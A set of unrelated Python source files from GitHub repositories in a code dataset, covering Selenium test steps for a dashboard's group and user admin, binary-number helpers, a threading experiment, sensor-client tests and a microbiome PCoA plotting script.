\"\"\"a[data-toggle=\"dropdown\"]\"\"\"\nGROUP_NAME_TITLE = '[for=\"id_group_name\"]'\nGROUP_TYPE_TITLE = '[mark-error=\"type\"]'\nCOUNTRY_TITLE = '[mark-error=\"country\"]'\nLICENSE_START_TITLE = '[for=\"id_license_start\"]'\nACCOUNT_MANAGER_TITLE = '[mark-error=\"account_manager\"]'\nGROUP_TYPE_SELECTOR = '.table.table.table-bordered.group-table.m-b-0 tbody tr:nth-child(4) td:nth-child(2)'\n\ndef select_group(context, group_name):\n context.execute_steps(u\"\"\"when filtering by {filter}\"\"\".format(filter=group_name))\n time.sleep(1)\n groups = context.browser.find_elements_by_css_selector(GROUPS_TABLE)\n for group in groups:\n #if group.text == re.search(\"(group_name)\", group.text):\n if group_name in group.text:\n print(\"lets click on \", group_name)\n group.click()\n else:\n assert False, \"Group {group} not found in {results}\".format(group=group_name, results=groups)\n\ndef action_on_checkbox(checkbox, action):\n input_element = checkbox.find_element_by_css_selector('input')\n checkbox_selected = input_element.is_selected()\n if action == 'enable':\n if checkbox_selected == False: #IF DISABLED CLICK ON THE ELEMENT\n input_element.click()\n return\n else:\n print('Checkbox already enabled, doing nothing')\n return\n elif action == 'disable':\n if checkbox_selected == True: #IF ENABLED CLICK ON THE ELEMENT\n input_element.click()\n return\n else:\n print('Checkbox already disabled, doing nothing')\n return\n else:\n assert False, \"Error specify a valid action (enable, disable)\"\n assert False, \"Error, the checkbox couldn't be {action}\".format(action=action)\n\ndef open_more_options(context):\n context.execute_steps(u\"\"\"then wait for element {element} identified by css_selector\"\"\".format(element=MORE_OPTIONS_BTN))\n el = context.browser.find_element_by_css_selector(MORE_OPTIONS_BTN)\n action = ActionChains(context.browser)\n action.move_to_element(el).click().perform()\n\ndef get_more_options_settings(context):\n try:\n context.execute_steps(u\"\"\"then wait for element {element} identified by css_selector\"\"\".format(element=MORE_OPTIONS))\n except:\n open_more_options(context)\n group_more_options = context.browser.find_element_by_css_selector(MORE_OPTIONS).text\n print(\"Group ops\", group_more_options)#.split(\"\\n\"))\n if group_more_options:\n return group_more_options.split(\"\\n\")\n else:\n assert False, \"Couldn't get group options\"\n\ndef get_active_roles(context):\n roles_in_table=context.browser.find_elements_by_css_selector(APPLIED_ROLES)\n active_roles=[str(role.text.strip(\",\").strip()) for role in roles_in_table]\n print(\"Active user roles: \", active_roles)\n return active_roles\n\ndef is_user_creator_role(context):\n creation_tools_roles=['Blippbuilder (Classic) User', 'Blippbuilder (New) User', 'Custom (JavaScript) User']\n active_roles=get_active_roles(context)\n creator_roles_in_table=[x for x in active_roles if x in creation_tools_roles]\n print(\"creator_roles_in_table\", creator_roles_in_table)\n return creator_roles_in_table\n\n\ndef revoke_access(context):\n roles_to_revoke = len(is_user_creator_role(context))\n print(\"Roles to revoke\", roles_to_revoke)\n while roles_to_revoke > 0 :\n open_more_options(context)\n more_settings = get_more_options_settings(context)\n print(\"More settings\", more_settings)\n for s in more_settings:\n if s.startswith(u'Revoke'):\n print(\"Found it\", s)\n element = context.browser.find_element_by_link_text(s)\n action = ActionChains(context.browser)\n action.move_to_element(element).click().perform()\n time.sleep(1)\n print(\"Active roles after click\", get_active_roles(context))\n open_more_options(context)\n else:\n print(\"No need to Revoke this access\", s)\n roles_to_revoke -= 1\n else:\n print(\"This user dont have creation tool access\")\n\ndef toggle_group_access_more_options(context, action, option):\n open_more_options(context)\n group_more_options = get_more_options_settings(context)\n group_more_options=[x.upper() for x in group_more_options]\n option_string = (option + \" access\").upper()\n print(\"Group options\", group_more_options)\n if option_string.upper().endswith(\"BLIPPBUILDER (CLASSIC) ACCESS\"):\n element = \"\"\"[roles=\"[tools.BLIPPBUILDER_FLASH.UserRole.Key]\"]\"\"\"\n elif option_string.upper().endswith(\"BLIPPBUILDER (NEW) ACCESS\"):\n element = \"\"\"[roles=\"[tools.BLIPPBUILDER_JAVASCRIPT.UserRole.Key]\"]\"\"\"\n elif option_string.upper().endswith(\"CUSTOM (JAVASCRIPT) ACCESS\"):\n element = \"\"\"[roles=\"[tools.BESPOKE_JAVASCRIPT.UserRole.Key]\"]\"\"\"\n elif option_string.upper().endswith(\"DEVELOPER (NETWORK & CUSTOM JS) ACCESS\"):\n element = \"\"\"[roles=\"[roles.DEVELOPER_NETWORK_ROLE.Key, roles.BESPOKE_JAVASCRIPT_ROLE.Key]\"]\"\"\"\n elif option_string.upper() in \"DISABLE USER\":\n element = \"\"\"[ng-click=\"actions.remove([user])\"]\"\"\"\n#TODO add other options\n else:\n assert False, \"Please provide correct options! {option}\".format(option=option_string)\n el=context.browser.find_elements_by_css_selector(element)\n el=el[0]\n roles = len(is_user_creator_role(context))\n if el.text.startswith(action):\n el.click()\n time.sleep(1)\n after_action_roles = len(is_user_creator_role(context))\n if action == \"Add\":\n assert roles + 1 == after_action_roles\n elif action == \"Revoke\":\n assert roles -1 == after_action_roles\n else:\n print(\"Is your action correct?\")\n print(\"Changed access\", el.text)\n time.sleep(1)\n else:\n print(\"No need to change this access\", el.text)\n\n# Load groups overview\n@when(\"navigating to Groups & Users\")\ndef step_impl(context):\n try:\n context.execute_steps(u\"\"\"then wait for element {element} identified by css_selector\"\"\".format(element=USER_DROPDOWN))\n context.execute_steps(u\"\"\"when click on button {element} identified by css_selector\"\"\".format(element=USER_DROPDOWN))\n context.execute_steps(u\"\"\"then wait for element {element} identified by css_selector\"\"\".format(element=SIDEBAR_GROUPS_LINK))\n context.execute_steps(u\"\"\"when clicking {selector}\"\"\".format(selector=SIDEBAR_GROUPS_LINK))\n context.execute_steps(u\"\"\"then expect {selector} to disappear within 30 seconds\"\"\".format(selector=LOADER))\n except:\n print(\"We have exception here: \", context.browser.title)\n\n\n@then(\"the Groups overview is loaded\")\ndef step_impl(context):\n context.execute_steps(\n u\"\"\"The screen Groups & users is opened\"\"\")\n\n@then(\"I wait for the filter to become visible\")\ndef step_impl(context):\n context.execute_steps(u\"\"\"then wait for {selector}\"\"\".format(selector=GROUP_FILTER))\n\n\n@when(\"filtering by {group_id}\")\ndef step_impl(context, group_id):\n context.execute_steps(u\"\"\"when typing {value} in {selector}\"\"\".format(value=group_id, selector=GROUP_FILTER))\n time.sleep(1)\n\n@when(\"I select the group {group_name}\")\ndef step(context, group_name):\n select_group(context, group_name)\n\n@when(\"I open the group {group_name} for edition\")\ndef step(context, group_name):\n select_group(context, group_name)\n context.execute_steps(u\"\"\"when click in link with text {text}\"\"\".format(text=\"Group Info\"))\n context.execute_steps(u\"\"\"when clicking {selector}\"\"\".format(selector=EDIT_GROUP_BUTTON))\n\n@when(\"I open the group shown\")\ndef step(context):\n context.execute_steps(u\"\"\"when click in link with text {text}\"\"\".format(text=\"Group Info\"))\n\n@when('I revoke access to all tools for user {user}')\ndef step(context, user):\n context.execute_steps(u\"\"\"when filtering by {filter}\"\"\".format(filter=user))\n #get_active_roles(context)\n #open_more_options(context)\n #get_more_options_settings(context)\n revoke_access(context)\n\n@then('I check that the user has all tools revoked')\ndef step(context):\n assert True, len(is_user_creator_role(context)) == 0\n\n@when(\"I {action} access to {creation_tool} on group or user level\")\ndef step(context, action, creation_tool):\n toggle_group_access_more_options(context, action, creation_tool)\n get_active_roles(context)\n\n@then(\"the first result is a group with ID {group_id}\")\ndef step_impl(context, group_id):\n time.sleep(1)\n #context.execute_steps(u\"\"\"then allow 1s to update the UI\"\"\")\n context.execute_steps(\n u\"\"\"then expect {selector} to contain {group_id}\"\"\".format(selector=TABLE_FIRST_ROW, group_id=group_id))\n\n@when(\"I click on Approvals on the left sidebar\")\ndef step_impl(context):\n context.execute_steps(u\"\"\"when clicking {selector}\"\"\".format(selector=SIDEBAR_APPROVALS))\n\n\n# Creating a group\n@when(\"I click on the New Group button\")\ndef step_impl(context):\n context.execute_steps(u\"\"\"when clicking {selector}\"\"\".format(selector=CREATE_NEW_GROUP_BUTTON))\n\n@then(\"the create new group modal is visible\")\ndef step_impl(context):\n context.execute_steps(u\"\"\"then wait for {selector}\"\"\".format(selector=GROUP_FORM))\n\n@when(\"filling out the new group form with the group name {group_name}\")\ndef step_impl(context, group_name):\n context.execute_steps(u\"\"\"when typing {value} in {selector}\"\"\".format(value=group_name, selector=GROUP_NAME_INPUT))\n # Country\n context.execute_steps(u\"\"\"when clicking {selector}\"\"\".format(value=group_name, selector=COUNTRY_DROPDOWN))\n context.execute_steps(u\"\"\"when clicking {selector}\"\"\".format(value=group_name, selector=FIRST_OPTION))\n # Group type\n context.execute_steps(u\"\"\"when clicking {selector}\"\"\".format(value=group_name, selector=GROUP_TYPE_DROPDOWN))\n context.execute_steps(u\"\"\"when clicking {selector}\"\"\".format(value=group_name, selector=FIRST_OPTION))\n\n@then(\"the submit button is clickable\")\ndef step_impl(context):\n #context.execute_steps(u\"\"\"then wait for {selector}\"\"\".format(selector=MODAL_LOGIN_SUBMIT_BUTTON))\n context.execute_steps(u\"\"\"then wait for element {selector} to be clickable\"\"\".format(selector=MODAL_LOGIN_SUBMIT_BUTTON))\n\n\n@when(\"I click on the modal submit button\")\ndef step_impl(context):\n context.execute_steps(u\"\"\"when clicking {selector}\"\"\".format(selector=MODAL_LOGIN_SUBMIT_BUTTON))\n context.execute_steps(u\"\"\"then expect {selector} to disappear\"\"\".format(selector=MODAL_LOGIN_SUBMIT_BUTTON))\n\n@then(\"a group is created with the group name {group_name}\")\ndef step_impl(context, group_name):\n context.execute_steps(u\"\"\"then wait for {selector}\"\"\".format(selector='.gritter-title'))\n\n\n# Updating a group\n@when(\"navigating to the last group\")\ndef step_impl(context):\n context.execute_steps(u\"\"\"when navigating to Groups & Users\"\"\")\n context.execute_steps(u\"\"\"when clicking {selector}\"\"\".format(selector=TABLE_HEADER_SORT_BY_ID))\n context.execute_steps(u\"\"\"when clicking {selector}\"\"\".format(selector=TABLE_FIRST_ROW))\n\n\n@when(\"I click on the edit group button\")\ndef step_impl(context):\n context.execute_steps(u\"\"\"when click in link with text {text}\"\"\".format(text=\"Group Info\"))\n context.execute_steps(u\"\"\"then wait for element {element} identified by css_selector\"\"\".format(element=EDIT_GROUP_BUTTON))\n context.execute_steps(u\"\"\"when clicking {selector}\"\"\".format(selector=EDIT_GROUP_BUTTON))\n\n\n@then(\"the edit group modal is visible\")\ndef step_impl(context):\n context.execute_steps(u\"\"\"then wait for element {element} identified by css_selector\"\"\".format(element=GROUP_FORM))\n\n\n@when(\"I click on the edit group form submit button\")\ndef step_impl(context):\n context.execute_steps(u\"\"\"when clicking {selector}\"\"\".format(selector=MODAL_LOGIN_SUBMIT_BUTTON))\n\n\n@then(\"the group is renamed to {group_name}\")\ndef step_impl(context, group_name):\n context.execute_steps(u\"\"\"then I expect a success message\"\"\")\n selector = context.browser.find_element_by_css_selector(GROUP_NAME_SELECTOR).text\n assert selector == group_name, \"Error: obtained value {value} doesn't match expected value {group_name}\".format(value=selector, group_name=group_name)\n\n\n@then(u'the group is updated')\ndef step_impl(context):\n context.execute_steps(u\"\"\"then expect {selector} to disappear\"\"\".format(selector=MODAL_EDIT_GROUP_WINDOW))\n\n# Creating a user\n@when(\"I click on the users tab\")\ndef step_impl(context):\n time.sleep(2)\n context.execute_steps(u\"\"\"when click in link with text {text}\"\"\".format(text=\"Users\"))\n\n\n@when(\"I click on the new user button in the toolbar\")\ndef step_impl(context):\n context.execute_steps(u\"\"\"when clicking {selector}\"\"\".format(selector=NEW_USER_BUTTON_TOOLBAR))\n\n\n@when(\"I create a new user trying any of the buttons\")\ndef step(context):\n context.execute_steps(u\"\"\"when click in link with text {text}\"\"\".format(text=\"Users\"))\n try:\n context.execute_steps(u\"\"\"when I click on the new user button\"\"\")\n except:\n context.execute_steps(u\"\"\"when I click on the new user button in the toolbar\"\"\")\n\n\n@then(\"the create new user modal is visible\")\ndef step_impl(context):\n context.execute_steps(u\"\"\"then wait for {selector}\"\"\".format(selector='h3.modal-title'))\n\n\n@when(\"filling out the new user form with first name {firstname} and last name {lastname}\")\ndef step_impl(context, firstname, lastname):\n email = 'someuser+group_admin_auto_{randy}@blippar.com'.format(randy=random.random())\n context.execute_steps(\n u\"\"\"when typing {firstname} in {selector}\"\"\".format(selector=FIRST_NAME_FIELD, firstname=firstname))\n context.execute_steps(\n u\"\"\"when typing {lastname} in {selector}\"\"\".format(selector=LAST_NAME_FIELD, lastname=lastname))\n context.execute_steps(u\"\"\"when typing {email} in {selector}\"\"\".format(selector=EMAIL_FIELD, email=email))\n\n\n@when(\"creating a user with first name {firstname} and last name {lastname} and email from global var {global_var}\")\ndef step(context, firstname, lastname, global_var):\n email = context.config.userdata[global_var]\n context.execute_steps(\n u\"\"\"when typing {firstname} in {selector}\"\"\".format(selector=FIRST_NAME_FIELD, firstname=firstname))\n context.execute_steps(\n u\"\"\"when typing {lastname} in {selector}\"\"\".format(selector=LAST_NAME_FIELD, lastname=lastname))\n context.execute_steps(u\"\"\"when typing {email} in {selector}\"\"\".format(selector=EMAIL_FIELD, email=email))\n\n\n@then(\"a user is created with first name {firstname} and last name {lastname}\")\ndef step_impl(context, firstname, lastname):\n context.execute_steps(\n u\"\"\"then expect {selector} to disappear within 5 seconds\"\"\".format(selector=DROPDOWN_SUBMIT))\n context.execute_steps(u\"\"\"then wait for element {element} identified by css_selector\"\"\".format(element='.gritter-title'))\n rows = context.browser.find_elements_by_css_selector(USER_TABLE_ROW)\n for row in rows:\n try:\n context.execute_steps(u\"\"\"then expect {selector} to contain {firstname}\"\"\".format(selector=USER_TABLE_ROW,\n firstname=firstname))\n context.execute_steps(\n u\"\"\"then expect {selector} to contain {lastname}\"\"\".format(selector=USER_TABLE_ROW, lastname=lastname))\n return\n except:\n pass\n assert False, \"Test failed: couldn't find user with firstname {firstname} and lastname {lastname}\" \\\n .format(firstname=firstname, lastname=lastname)\n\n\n@when(\"I click on the confirm button\")\ndef step_impl(context):\n context.execute_steps(u\"\"\"when clicking {selector}\"\"\".format(selector=CONFIRM_BUTTON))\n\n@then(\"all users are marked as deleted\")\ndef step_impl(context):\n context.execute_steps(u\"\"\"then I expect a success message\"\"\")\n rows = context.browser.find_elements_by_css_selector(USER_TABLE_ROW)\n for row in rows:\n if 'DELETED' not in row.text.upper():\n assert False, \"User not deleted\"\n\n\n@when(\"I set {checkbox_name} checkbox {status}\")\ndef step(context, checkbox_name, status):\n checkboxes = context.browser.find_elements_by_css_selector(CREATION_TOOLS_CHECKBOXES)\n for checkbox in checkboxes:\n if checkbox.text == checkbox_name:\n if status == 'enabled':\n action_on_checkbox(checkbox, 'enable')\n return\n elif status == 'disabled':\n action_on_checkbox(checkbox, 'disable')\n return\n else:\n assert False, \"Error, must provide enabled or disabled for creation tool checkbox\"\n assert False, \"Error, invalid checkbox name\"\n\n@when(\"I open the user page for blippar group\") #hard coded url with a group number in it but it's not a problem cause we use it only once in 6-hub-groups-and-users.feature\ndef step(context):\n url = urlparse.urljoin(context.config.userdata['target_env'], \"dashboard/group/7/users\")\n context.execute_steps(u\"\"\"when opening the url {url}\"\"\".format(url=url))\n\n@then(\"I wait up to {time} secs for the users to load\")\ndef step(context, time):\n context.execute_steps(u\"\"\"then wait up to {timeout} seconds for {selector}\"\"\".format(timeout=time, selector=USER_TABLE_ROW))\n\n#approve/disapprove the blipp\n@then('admin sets checkbox blipp {blipp_name} {status}')\ndef step_impl(context, blipp_name, status):\n checkboxes = context.browser.find_elements_by_css_selector(BLIPP_APPROVE_CHECKBOX)\n for checkbox in checkboxes:\n print(\"checkbox.text\", checkbox.text)\n if checkbox.text == blipp_name:\n if status == 'enabled':\n checkbox.click()\n return\n elif status == 'disabled':\n checkbox.click()\n return\n else:\n assert False, \"Error, must provide enabled or disabled for blipp approval checkbox\"\n assert False, \"Error, invalid checkbox name\"\n\n@then('the following fields are displayed {group_name},{group_type},{country},{license_date},{account_manager}')\ndef step(context, group_name, group_type, country,license_date, account_manager):\n context.execute_steps(u\"\"\"then wait for {selector}\"\"\".format(selector=GROUP_NAME_TITLE))\n context.execute_steps(u\"\"\"then expect {selector} to contain {group_name}\"\"\".format(selector=GROUP_NAME_TITLE, group_name=group_name))\n context.execute_steps(u\"\"\"then expect {selector} to contain {group_type}\"\"\".format(selector=GROUP_TYPE_TITLE, group_type=group_type))\n context.execute_steps(u\"\"\"then expect {selector} to contain {country}\"\"\".format(selector=COUNTRY_TITLE, country=country))\n context.execute_steps(u\"\"\"then expect {selector} to contain {license_date}\"\"\".format(selector=LICENSE_START_TITLE, license_date=license_date))\n context.execute_steps(u\"\"\"then expect {selector} to contain {account_manager}\"\"\".format(selector=ACCOUNT_MANAGER_TITLE, account_manager=account_manager))\n\n@then('the Group type field contains {group_type}')\ndef step(context, group_type):\n context.execute_steps(u\"\"\"then wait for {selector}\"\"\".format(selector=GROUP_TYPE_SELECTOR))\n context.execute_steps(u\"\"\"then expect {selector} to contain {group_type}\"\"\".format(selector=GROUP_TYPE_SELECTOR, group_type=group_type))\n","repo_name":"Syslog2905/Xentio_Python","sub_path":"features/steps/steps.groups_users.py","file_name":"steps.groups_users.py","file_ext":"py","file_size_in_byte":21134,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"22003202813","text":"from random import choices, randint\n\n\ndef add_binaries(a, b):\n \"\"\"\n Add two binary numbers.\n \"\"\"\n\n # we want a to be the higher number\n la = len(a)\n lb = len(b)\n if lb > la:\n a, b = b, a\n\n i = la - 1\n j = lb - 1\n carry = 0\n answer = ''\n\n # sum numbers while there are bits on the smallest\n while j >= 0:\n cur = int(a[i]) + int(b[j]) + carry\n answer = str(cur % 2) + answer\n if cur > 1:\n carry = 1\n else:\n carry = 0\n i -= 1\n j -= 1\n\n # sum remaining bits from the longest\n while i >= 0:\n cur = int(a[i]) + carry\n answer = str(cur % 2) + answer\n if cur > 1:\n carry = 1\n else:\n carry = 0\n i -= 1\n\n if carry:\n answer = '1' + answer\n return answer\n\n\ndef binary_to_decimal(number):\n \"\"\"\n Converts a binary number into a decimal number.\n This function does not check if the string is only made of ones and zeros.\n\n :param str number: string representing a binary number, e.g. '1011'\n :return int: integer conversion\n \"\"\"\n l = len(number) - 1\n i = 0\n integer = 0\n\n while l >= 0:\n if number[l] == '1':\n integer += 2 ** i\n i += 1\n l -= 1\n\n return integer\n\n\ndef decimal_to_binary(number):\n \"\"\"\n Converts a decimal number to binary.\n\n :param int: decimal number\n :return str: string representing a binary number\n \"\"\"\n if number == 0:\n return \"0\"\n binary = \"\"\n while number != 0:\n remaining = number % 2\n if remaining == 1:\n binary = \"1\" + binary\n else:\n binary = \"0\" + binary\n number //= 2\n return binary\n","repo_name":"jschnab/leetcode","sub_path":"binary_numbers.py","file_name":"binary_numbers.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35916883456","text":"#!/usr/bin/python\n########################################################################################################################\n# Joe's Python Experimente - Multithreading Test\n#-----------------------------------------------------------------------------------------------------------------------\n# \\file PythreadTest.py\n# \\creation 2015-03-04, Joe Merten\n#-----------------------------------------------------------------------------------------------------------------------\n# Ablauf, es werten:\n# - ein (bzw. jetzt 4) Threads gestartet, der ohne sleep dauerhaft was tut (und zu gucken, ob es sowas wie Preemtion gibt)\n# - hat einer for-Schleife ebenso funktioniert wie auch mit perf_counter()\n# - offensichtlich wird nur 1 Cpu Kern verwendet\n# - ein paar Signalhandler registriert (zum prüfen, ob simultan zum Rest, auf Signale reagiert wird)\n# - 4 \"WorkerThreads\" instanziiert, die auf einer Queue lauschen und dort auf Arbeit warten\n# - die Queue mit \"Arbeit\" gefüllt\n# - auf Beendigung der Queue-Abarbeitung (durch die WorkerThreads) gewartet\n########################################################################################################################\n\nimport threading\nfrom queue import Queue\nimport time\nimport signal, os\n\n# lock to serialize console output\nlock = threading.Lock()\n\ndef doWork(item):\n time.sleep(item) # pretend to do some lengthy work.\n # Make sure the whole print completes or threads can mix up output in one line.\n with lock: print(threading.current_thread().name, item)\n\n# The worker thread pulls an item from the queue and processes it\ndef workerThreadFunc():\n while True:\n item = q.get()\n doWork(item)\n q.task_done()\n\ndef startWorkerThreads():\n for i in range(4):\n t = threading.Thread(target=workerThreadFunc, name=i+1) #\"bla\"+str(i))\n t.daemon = True # thread dies when main thread (only non-daemon thread) exits.\n t.start()\n\ndef fillQueue():\n for item in range(20): q.put(item)\n\n\ndef blockingThreadFunc():\n while True:\n start = time.perf_counter()\n while True:\n elapsed = time.perf_counter() - start\n if elapsed > 5: break\n #i=0\n #while True:\n # i = i + 1\n # if i > 10000000: break\n with lock: print(threading.current_thread().name, \"Hellö 𝘑𝘰𝘦 😎\")\n\ndef startBlockingThread():\n for i in range(4):\n bt = threading.Thread(target=blockingThreadFunc, name=\"Blocking \" + str(i+1))\n bt.daemon = True\n bt.start()\n\n\ndef signalHandler(signum, frame):\n with lock: print('Signal handler called with signal', signum)\n signal.alarm(1)\n\ndef setSignalHandlers():\n signal.signal(signal.SIGALRM, signalHandler)\n signal.signal(signal.SIGUSR1, signalHandler)\n signal.signal(signal.SIGUSR2, signalHandler)\n\n\n# Main\nstart = time.perf_counter()\nsetSignalHandlers()\nstartBlockingThread()\nq = Queue()\nstartWorkerThreads()\nfillQueue()\nq.join() # block until all tasks are done\n\nprint('time: ', time.perf_counter() - start)","repo_name":"JoeMerten/PythonPlayground","sub_path":"PythreadTest.py","file_name":"PythreadTest.py","file_ext":"py","file_size_in_byte":3067,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"40647197264","text":"import unittest\nimport os\nimport grp\nfrom myDevices.sensors import sensors\nfrom myDevices.utils.version import MAPPING\nfrom myDevices.devices import manager\nfrom myDevices.utils.config import Config\nfrom myDevices.utils import types\nfrom myDevices.utils.logger import exception, setDebug, info, debug, error, logToFile, setInfo\nfrom myDevices.devices.bus import checkAllBus, BUSLIST\nfrom myDevices.devices.digital.gpio import NativeGPIO as GPIO\nfrom myDevices.devices import instance\nfrom time import sleep\nfrom json import loads, dumps\n\nclass SensorsClientTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.client = sensors.SensorsClient()\n\n @classmethod\n def tearDownClass(cls):\n cls.client.StopMonitoring()\n del cls.client\n del GPIO.instance\n\n def testBusInfo(self):\n bus = SensorsClientTest.client.BusInfo()\n # # Compare our GPIO function values with the ones from RPi.GPIO library\n # import RPi.GPIO\n # RPi.GPIO.setmode(RPi.GPIO.BCM)\n # port_use = {0:\"GPIO.OUT\", 1:\"GPIO.IN\", 40:\"GPIO.SERIAL\", 41:\"GPIO.SPI\", 42:\"GPIO.I2C\", 43:\"GPIO.HARD_PWM\", -1:\"GPIO.UNKNOWN\"}\n # for gpio in range(GPIO.GPIO_COUNT):\n # try:\n # print('{}: {} | {}'.format(gpio, bus['GPIO'][gpio]['function'], port_use[RPi.GPIO.gpio_function(gpio)]))\n # except ValueError as error:\n # print('{}: {}'.format(error, gpio))\n self.assertEqual(set(bus.keys()), set(['GpioMap', 'SPI', 'GPIO', 'ONEWIRE', 'I2C', 'UART']))\n\n def testSetFunction(self):\n self.setChannelFunction(5, 'IN')\n self.setChannelFunction(5, 'OUT')\n\n def testSetValue(self):\n self.setChannelValue(5, 1)\n self.setChannelValue(5, 0)\n\n def testSensors(self):\n #Test adding a sensor\n testSensor = {'description': 'Digital Input', 'device': 'DigitalSensor', 'args': {'gpio': 'GPIO', 'invert': False, 'channel': 12}, 'name': 'testdevice'}\n compareKeys = ('args', 'description', 'device')\n retValue = SensorsClientTest.client.AddSensor(testSensor['name'], testSensor['description'], testSensor['device'], testSensor['args'])\n self.assertTrue(retValue)\n retrievedSensor = next(obj for obj in SensorsClientTest.client.GetDevices() if obj['name'] == testSensor['name'])\n for key in compareKeys:\n self.assertEqual(testSensor[key], retrievedSensor[key])\n #Test updating a sensor\n editedSensor = testSensor\n editedSensor['args']['channel'] = 13\n retValue = SensorsClientTest.client.EditSensor(editedSensor['name'], editedSensor['description'], editedSensor['device'], editedSensor['args'])\n self.assertTrue(retValue)\n retrievedSensor = next(obj for obj in SensorsClientTest.client.GetDevices() if obj['name'] == editedSensor['name'])\n for key in compareKeys:\n self.assertEqual(editedSensor[key], retrievedSensor[key])\n #Test removing a sensor\n retValue = SensorsClientTest.client.DeleteSensor(testSensor['name'])\n self.assertTrue(retValue)\n deviceNames = [device['name'] for device in SensorsClientTest.client.GetDevices()]\n self.assertNotIn(testSensor['name'], deviceNames)\n\n def testSensorInfo(self):\n sensors = {'actuator' : {'description': 'Digital Output', 'device': 'DigitalActuator', 'args': {'gpio': 'GPIO', 'invert': False, 'channel': 16}, 'name': 'test_actuator'},\n 'light_switch' : {'description': 'Light Switch', 'device': 'LightSwitch', 'args': {'gpio': 'GPIO', 'invert': True, 'channel': 15}, 'name': 'test_light_switch'},\n 'MCP3004' : {'description': 'MCP3004', 'device': 'MCP3004', 'args': {'chip': '0'}, 'name': 'test_MCP3004'},\n 'distance' : {'description': 'Analog Distance Sensor', 'device': 'DistanceSensor', 'args': {'adc': 'test_MCP3004', 'channel': 0}, 'name': 'test_distance'}}\n for sensor in sensors.values():\n SensorsClientTest.client.AddSensor(sensor['name'], sensor['description'], sensor['device'], sensor['args'])\n SensorsClientTest.client.SensorsInfo()\n #Test setting sensor values\n self.setSensorValue(sensors['actuator'], 1)\n self.setSensorValue(sensors['actuator'], 0)\n self.setSensorValue(sensors['light_switch'], 1)\n self.setSensorValue(sensors['light_switch'], 0)\n #Test getting analog value\n retrievedSensorInfo = next(obj for obj in SensorsClientTest.client.SensorsInfo() if obj['name'] == sensors['distance']['name'])\n self.assertEqual(retrievedSensorInfo['float'], 0.0)\n for sensor in sensors.values():\n self.assertTrue(SensorsClientTest.client.DeleteSensor(sensor['name']))\n\n def testSystemInfo(self):\n system_info = SensorsClientTest.client.SystemInformation()\n self.assertEqual(set(system_info.keys()), set(['Storage', 'Cpu', 'CpuLoad', 'Uptime', 'Network', 'Memory']))\n\n def setSensorValue(self, sensor, value):\n SensorsClientTest.client.SensorCommand('integer', sensor['name'], sensor['device'], None, None, None, value)\n sensorInfo = next(obj for obj in SensorsClientTest.client.SensorsInfo() if obj['name'] == sensor['name'])\n self.assertEqual(value, sensorInfo['value'])\n\n def setChannelFunction(self, channel, function):\n SensorsClientTest.client.gpio.setFunctionString(channel, function)\n bus = SensorsClientTest.client.BusInfo()\n self.assertEqual(function, bus['GPIO'][channel]['function'])\n\n def setChannelValue(self, channel, value):\n SensorsClientTest.client.gpio.digitalWrite(channel, value)\n bus = SensorsClientTest.client.BusInfo()\n self.assertEqual(value, bus['GPIO'][channel]['value'])\n\nif __name__ == '__main__':\n setInfo()\n unittest.main()\n","repo_name":"mongrelx/Cayenne-Agent","sub_path":"myDevices/test/client_test.py","file_name":"client_test.py","file_ext":"py","file_size_in_byte":5835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"9788367385","text":"import wgsunifrac as wu\nimport argparse\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Get pcoa plot of taxonomic profiles in a direcory.\")\n parser.add_argument('-dir', '--dir', type=str, help=\"The directory where profiles are located.\")\n parser.add_argument('-t', '--plt_title', type=str, help=\"Title of the pcoa plot.\")\n parser.add_argument('-a', '--alpha', type=float, help=\"The factor for branch length function. -1, -0.5, 0, 1, 5\")\n parser.add_argument('-by', '--by', type=str, help=\"For real data. choices: bodysites, study\",default=\"bodysites\")\n parser.add_argument('-type', '--data_type', type=str, help=\"real or simulated.\")\n parser.add_argument('-s', '--save', type=str, help=\"File name to save file as.\") \n\n args = parser.parse_args()\n dir = args.dir\n plt_title = args.plt_title\n alpha = args.alpha\n dtype = args.data_type\n by = args.by\n\n if dtype == \"simulated\":\n sample_lst, dist_matrix, metadata = tu.pairwise_unifrac(dir, plt_title)\n wu.pairwise_unifrac(dir, plt_title, alpha)\n else:\n #real data\n metadata = wu.get_metadata_from_real_data_partial('data/body_sites12261.csv', dir)\n dist_matrix, sample_lst = wu.just_pairwise_unifrac(dir, alpha)\n wu.get_pcoa(dist_matrix,sample_lst,metadata,plt_title,args.save)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"KoslickiLab/WGSUniFrac-reproducibles","sub_path":"get_wgs_pcoa_plot.py","file_name":"get_wgs_pcoa_plot.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39771532442","text":"from twisted.internet.defer import inlineCallbacks\nfrom src.utils.test_utils import DottTestCase\nfrom src.daemons.server.commands.parser import CommandParser, ParsedCommand\nfrom src.daemons.server.commands.cmdtable import CommandTable, DuplicateCommandException\nfrom src.daemons.server.commands.command import BaseCommand\n\n\nclass CommandTableTests(DottTestCase):\n\n @inlineCallbacks\n def setUp(self):\n yield super(CommandTableTests, self).setUp()\n\n self.table = CommandTable()\n\n @inlineCallbacks\n def tearDown(self):\n yield super(CommandTableTests, self).tearDown()\n\n del self.table\n\n def test_add_and_lookup(self):\n \"\"\"\n Tests some simple success cases. A fake command is added to the\n command table, we perform some lookups.\n \"\"\"\n # Create a fake command to add to the command table.\n cmd = BaseCommand()\n # This is the full name for the command.\n cmd.name = 'test'\n # The command can also be called with these values.\n cmd.aliases = ['t']\n # Add command to command table.\n self.table.add_command(cmd)\n\n # Perform a name-based lookup for the command. Result should be the\n # BaseCommand() instance we created earlier.\n self.assertIs(self.table.match_name('test'), cmd)\n # Same as above, but this time look for alias matches.\n self.assertIs(self.table.match_alias('t'), cmd)\n\n # Now take a step back and create a fake parsed command (from the user).\n # This is as if a user typed 'test'.\n parsed = ParsedCommand('test', [], [])\n # Hand the command off to the command table and ask it to return\n # a match, if there is one. This 